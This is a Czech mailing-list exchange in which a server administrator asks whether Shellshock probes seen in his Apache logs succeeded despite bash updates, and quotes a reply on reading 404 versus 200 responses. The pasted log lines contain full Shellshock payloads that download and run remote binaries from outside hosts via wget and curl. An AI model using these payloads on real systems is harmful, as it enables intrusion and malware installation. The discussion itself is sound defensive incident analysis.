Díky za odpovědi,
ano, to jsem si myslel. Mě právě zarazilo, že v logu mám nějaké odpovědi 200:
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /test HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:31 +0200] "GET / HTTP/1.0" 200 3296 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
212.51.60.58 - - [29/Sep/2014:00:30:18 +0200] "GET / HTTP/1.0" 200 3296 "-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"
A to přesto, že jsem bash aktualizoval už 24. a 26.9. (mám aktuální verzi Debianu). Viz výpis "less /var/log/apt/history.log":
Start-Date: 2014-09-24 16:38:28 Upgrade: bash:amd64 (4.2+dfsg-0.1, 4.2+dfsg-0.1+deb7u1) End-Date: 2014-09-24 16:38:34
Start-Date: 2014-09-26 08:39:57 Install: php5-cli:amd64 (5.4.33-1~dotdeb.1) End-Date: 2014-09-26 08:40:18
Start-Date: 2014-09-26 15:10:51 Upgrade: bash:amd64 (4.2+dfsg-0.1+deb7u1, 4.2+dfsg-0.1+deb7u3) End-Date: 2014-09-26 15:11:23
Poradíte, co teď dál?
Honza
On 29.9.2014 10:12, Petr Krcmar wrote:
Dne 29.9.2014 v 10:08 "Jan B. Kolář" napsal(a):
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam vidíš 404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál. Jestli byl útok úspěšný tam nevyčteš.